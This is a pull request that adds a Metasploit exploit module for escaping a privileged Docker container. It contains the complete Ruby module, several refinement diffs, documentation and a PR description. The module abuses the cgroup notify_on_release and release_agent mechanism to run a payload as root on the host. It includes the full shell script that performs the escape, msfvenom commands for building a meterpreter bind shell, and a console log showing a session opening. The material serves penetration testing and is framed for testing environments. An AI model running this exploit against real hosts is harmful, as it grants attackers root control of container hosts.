### PR TITLE
Added Module: priviledged docker container escape

### DIFF
--- a/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md
@@ -56,7 +56,7 @@ Force the exploit to search for the payload in the file system rather than copyi
 
 A directory where we can write files inside the container (default is /tmp). This is needed to drop the payload into the container.
 
-## WritableContainerDir
+## WritableHostDir
 
 A directory where we can write files on the host (default is /tmp). This is needed to copy the payload from the container onto the host. Alternatively see ForcePayloadSearch
 

--- a/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-Docker Privileged Container Escape that obtains root on the host machine by abusing the Linux cgroup notification on relase feature.
+Docker Privileged Container Escape that obtains root on the host machine by abusing the Linux cgroup notification on rebase feature.
 
 Both meterpreter shell and classic shell are supported. The exploit will copy a payload to a writable directory in the container and then escape the container and either search for the payload on the file system or copy it directly from the container and then execute it on the host. 
 

--- a/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md
@@ -1,0 +1,78 @@
+## Vulnerable Application
+
+Docker Privileged Container Escape that obtains root on the host machine by abusing the Linux cgroup notification on relase feature.
+
+Both meterpreter shell and classic shell are supported. The exploit will copy a payload to a writable directory in the container and then escape the container and either search for the payload on the file system or copy it directly from the container and then execute it on the host. 
+
+# Creating A Testing Environment
+
+- Install Docker
+- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host)
+```bash
+docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu
+```
+- Obtain a shell on the container with metasploit. One possible option is:
+```bash
+# Create a bind shell using msfvenom
+msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin
+# Copy bind shell into container
+docker cp ./bind4444.bin test-vuln-container:/bind4444.bin
+# Execute bind shell in the container
+docker exec -it test-vuln-container /bind4444.bin
+```
+- Connect to this bind shell in metasploit
+```bash
+use multi/handler
+set payload linux/x64/meterpreter/bind_tcp
+set rhost 127.0.0.1
+set lport 4444
+run
+```
+
+## Verification Steps
+
+1. `use exploit/linux/local/docker_privileged_container_escape`
+2. `set SESSION [session]`
+3. `set PAYLOAD [payload]`
+4. `set LHOST [lhost]`
+5. `set LPORT [lport]`
+6. `exploit`
+
+## Options
+
+## PAYLOAD
+
+Set this option to choose which type of root session you want to create.
+
+## ForceExploit
+
+Force exploit even if the current session does not appear to be in a docker container, or the container does not appear vulnerable.
+
+## ForcePayloadSearch
+
+Force the exploit to search for the payload in the file system rather than copying out of the docker container. This avoids the need for a writable directory on the host system. Typically, the filesystem of the container will be located in the `/var/lib/docker/overlay2/` directory.
+
+## WritableContainerDir
+
+A directory where we can write files inside the container (default is /tmp). This is needed to drop the payload into the container.
+
+## WritableContainerDir
+
+A directory where we can write files on the host (default is /tmp). This is needed to copy the payload from the container onto the host. Alternatively see ForcePayloadSearch
+
+# Scenarios
+
+## Container Escape starting with a meterpreter shell
+
+```
+msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape
+msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1
+session => 1
+msf5 exploit(linux/local/lxc_privilege_escalation) > run
+
+[*] Started reverse TCP handler on 10.0.2.15:4444 
+[*] Writing payload executable to '/tmp/aLQdBKpMXLo'
+[*] Executing script to exploit privileged container
+[*] Sending stage (3012516 bytes) to 192.168.0.231
+[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100
+```

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -17,37 +17,37 @@ class MetasploitModule < Msf::Exploit::Local
   def initialize(info = {})
     super(
         update_info(
-            info,
-            {
-                'Name' => 'Docker Privileged Container Escape',
-                'Description' => %q{
+          info,
+          {
+            'Name' => 'Docker Privileged Container Escape',
+            'Description' => %q{
               This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
               feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
             },
-                'License' => MSF_LICENSE,
-                'Author' => ['stealthcopter'],
-                'Platform' => 'linux',
-                'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
-                'Targets' => [['Automatic', {}]],
-                'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
-                'SessionTypes' => ['shell', 'meterpreter'],
-                'DefaultTarget' => 0,
-                'References' => [
-                    ['EDB', '47147'],
-                    ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
-                    ['URL', 'https://github.com/stealthcopter/deepce']
-                ],
-                'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
-            }
+            'License' => MSF_LICENSE,
+            'Author' => ['stealthcopter'],
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+            'Targets' => [['Automatic', {}]],
+            'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
+            'SessionTypes' => ['shell', 'meterpreter'],
+            'DefaultTarget' => 0,
+            'References' => [
+              ['EDB', '47147'],
+              ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
+              ['URL', 'https://github.com/stealthcopter/deepce']
+            ],
+            'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
+          }
         )
     )
     register_advanced_options(
-        [
-            OptBool.new('ForceExploit', [false, 'Override check result', false]),
-            OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
-            OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
-            OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),
-        ]
+      [
+        OptBool.new('ForceExploit', [false, 'Override check result', false]),
+        OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
+        OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
+        OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),
+      ]
     )
   end
 
@@ -97,11 +97,10 @@ class MetasploitModule < Msf::Exploit::Local
     exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}"
     print_status("Writing payload executable to '#{exe_path}'")
 
-    write_file(exe_path, pl)
+    upload_and_chmodx(exe_path, pl)
     register_file_for_cleanup(exe_path)
 
     print_status('Executing script to exploit privileged container')
-    vprint_status(cmd_exec("chmod +x #{exe_path}"))
 
     script = shell_script(exe_path)
 

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -88,13 +88,6 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    unless check == CheckCode::Vulnerable
-      unless datastore['ForceExploit']
-        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
-      end
-      print_warning 'Target does not appear to be vulnerable'
-    end
-
     unless writable? base_dir_container
       fail_with Failure::BadConfig, "#{base_dir_container} is not writable"
     end

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
   # Check we have all the prerequisites to perform the escape
   def check
     # are in a docker container
-    unless cmd_exec('test -f /.dockerenv && echo true') =~ /true$/
+    unless file?('/.dockerenv')
       return Exploit::CheckCode::Safe('Not inside a Docker container, use ForceExploit to override')
     end
 

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -7,6 +7,7 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Post::File
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::System

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     # are in a docker container
     unless file?('/.dockerenv')
-      return Exploit::CheckCode::Safe('Not inside a Docker container, use ForceExploit to override')
+      return CheckCode::Safe('Not inside a Docker container')
     end
 
     # is root user

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -1,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# POC modified from https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+        update_info(
+            info,
+            {
+                'Name' => 'Docker Privileged Container Escape',
+                'Description' => %q{
+              This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
+              feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
+            },
+                'License' => MSF_LICENSE,
+                'Author' => ['stealthcopter'],
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+                'Targets' => [['Automatic', {}]],
+                'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
+                'SessionTypes' => ['shell', 'meterpreter'],
+                'DefaultTarget' => 0,
+                'References' => [
+                    ['EDB', '47147'],
+                    ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
+                    ['URL', 'https://github.com/stealthcopter/deepce']
+                ],
+                'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
+            }
+        )
+    )
+    register_advanced_options(
+        [
+            OptBool.new('ForceExploit', [false, 'Override check result', false]),
+            OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
+            OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
+            OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),
+        ]
+    )
+  end
+
+  def base_dir_container
+    datastore['WritableContainerDir'].to_s
+  end
+
+  def base_dir_host
+    datastore['WritableHostDir'].to_s
+  end
+
+  # Get the container id and check it's the expected 64 char hex string, otherwise return nil
+  def container_id
+    id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp
+    unless id.match(/\A[\h]{64}\z/).nil?
+      id
+    end
+  end
+
+  # Check we have all the prerequisites to perform the escape
+  def check
+    # are in a docker container
+    unless cmd_exec('test -f /.dockerenv && echo true') =~ /true$/
+      return Exploit::CheckCode::Safe('Not inside a Docker container, use ForceExploit to override')
+    end
+
+    # is root user
+    unless is_root?
+      return Exploit::CheckCode::Safe('Exploit requires root inside container')
+    end
+
+    # are rdma files present in /sys/
+    path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1')
+    unless path.start_with? '/'
+      return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')
+    end
+
+    Exploit::CheckCode::Vulnerable('Inside Docker container and target appears vulnerable')
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    unless writable? base_dir_container
+      fail_with Failure::BadConfig, "#{base_dir_container} is not writable"
+    end
+
+    pl = generate_payload_exe
+    exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    print_status('Executing script to exploit privileged container')
+    vprint_status(cmd_exec("chmod +x #{exe_path}"))
+
+    script = shell_script(exe_path)
+
+    vprint_status("Script: #{script}")
+    print_status(cmd_exec(script))
+
+    print_status "Waiting #{datastore['WfsDelay']}s for payload"
+  end
+
+  def shell_script(payload_path)
+    # The tricky bit is finding the payload on the host machine in order to execute it. The options here are
+    # 1. Find the file on the host operating system `find /var/lib/docker/overlay2/ -name 'JGsgvlU' -exec {} \;`
+    # 2. Copy the payload out of the container and execute it `docker cp containerid:/tmp/JGsgvlU /tmp/JGsgvlU && /tmp/JGsgvlU`
+
+    id = container_id
+    filename = File.basename(payload_path)
+
+    vprint_status("container id #{id}")
+
+    # If we cant find the id, or user requested it, search for the payload on the filesystem rather than copying it out of container
+    if id.nil? || datastore['ForcePayloadSearch']
+      # We couldn't find a container name, lets try and find the payload on the filesystem and then execute it
+      print_status('Searching for payload on host')
+      command = "find /var/lib/docker/overlay2/ -name '#{filename}' -exec {} \\;"
+    else
+      # We found a container id, copy the payload to host, then execute it
+      payload_path_host = "#{base_dir_host}/#{filename}"
+      print_status("Found container id #{container_id}, copying payload to host")
+      command = "docker cp #{id}:#{payload_path} #{payload_path_host}; #{payload_path_host}"
+    end
+
+    vprint_status(command)
+
+    %{
+      d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)")
+      mkdir -p "$d/w"
+      echo 1 >"$d/w/notify_on_release"
+      t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)"
+      touch /o
+      echo "$t/c" >"$d/release_agent"
+      printf "#!/bin/sh\\n%s > %s/o" "#{command}" "$t">/c
+      chmod +x /c
+      sh -c "echo 0 >$d/w/cgroup.procs"
+      sleep 1
+      cat /o
+      rm /c /o
+    }.strip.split("\n").map(&:strip).join(';')
+  end
+end

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Local
       return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')
     end
 
-    Exploit::CheckCode::Vulnerable('Inside Docker container and target appears vulnerable')
+    CheckCode::Appears('Inside Docker container and target appears vulnerable')
   end
 
   def exploit

--- a/modules/exploits/linux/local/docker_privileged_container_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -134,19 +134,24 @@ class MetasploitModule < Msf::Exploit::Local
 
     vprint_status(command)
 
+    # the cow variables are random filenames to use for the exploit
+    c = rand_text_alpha(6..8)
+    o = rand_text_alpha(6..8)
+    w = rand_text_alpha(6..8)
+
     %{
       d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)")
-      mkdir -p "$d/w"
-      echo 1 >"$d/w/notify_on_release"
+      mkdir -p "$d/#{w}"
+      echo 1 >"$d/#{w}/notify_on_release"
       t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)"
-      touch /o
-      echo "$t/c" >"$d/release_agent"
-      printf "#!/bin/sh\\n%s > %s/o" "#{command}" "$t">/c
-      chmod +x /c
-      sh -c "echo 0 >$d/w/cgroup.procs"
+      touch /#{o}
+      echo "$t/#{c}" >"$d/release_agent"
+      printf "#!/bin/sh\\n%s > %s/#{o}" "#{command}" "$t">/#{c}
+      chmod +x /#{c}
+      sh -c "echo 0 >$d/#{w}/cgroup.procs"
       sleep 1
-      cat /o
-      rm /c /o
+      cat /#{o}
+      rm /#{c} /#{o}
     }.strip.split("\n").map(&:strip).join(';')
   end
 end


### PR DESCRIPTION
New module: Docker Privileged Container Escape that obtains root on the host machine from a privileged docker container by abusing the Linux cgroup notification on release feature.

## Creating A Testing Environment

- Install Docker
- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host)
```bash
docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu
```
- Obtain a shell on the container with metasploit. One possible option is:
```bash
# Create a bind shell using msfvenom
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin
# Copy bind shell into container
docker cp ./bind4444.bin test-vuln-container:/bind4444.bin
# Execute bind shell in the container
docker exec -it test-vuln-container /bind4444.bin
```
- Connect to this bind shell in metasploit
```bash
use multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 127.0.0.1
set lport 4444
run
```

## Verification Steps

1. `use exploit/linux/local/docker_privileged_container_escape`
2. `set SESSION [session]`
3. `set PAYLOAD [payload]`
4. `set LHOST [lhost]`
5. `set LPORT [lport]`
6. `exploit`

## Scenarios

### Container Escape starting with a meterpreter shell

```
msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape
msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/lxc_privilege_escalation) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Writing payload executable to '/tmp/aLQdBKpMXLo'
[*] Executing script to exploit privileged container
[*] Sending stage (3012516 bytes) to 192.168.0.231
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100
```